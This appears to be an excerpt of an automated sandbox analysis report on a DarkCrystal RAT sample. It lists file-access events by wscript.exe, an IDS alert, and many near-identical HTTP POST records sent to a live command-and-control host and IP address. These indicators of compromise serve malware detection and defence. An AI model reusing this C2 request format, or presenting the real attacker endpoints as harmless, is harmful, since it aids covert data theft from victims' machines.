Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Local
Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll

                                    Networking

Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49730 -> 104.21.38.84:80
Source: Joe Sandbox View | IP Address: 104.21.38.84
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: global traffic | HTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 891781cm.renyash.ru | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 891781cm.renyash.ru | Content-Length: 384 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 891781cm.renyash.ru | Content-Length: 1792 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 891781cm.renyash.ru | Content-Length: 1072 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 891781cm.renyash.ru | Content-Length: 1072 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 891781cm.renyash.ru | Content-Length: 1072 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 891781cm.renyash.ru | Content-Length: 1072 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 891781cm.renyash.ru | Content-Length: 159884 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 891781cm.renyash.ru | Content-Length: 1072 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 891781cm.renyash.ru | Content-Length: 1072 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 891781cm.renyash.ru | Content-Length: 1072 | Expect: 100-continue | Connection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1064Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1784Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1064Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1064Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1756Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
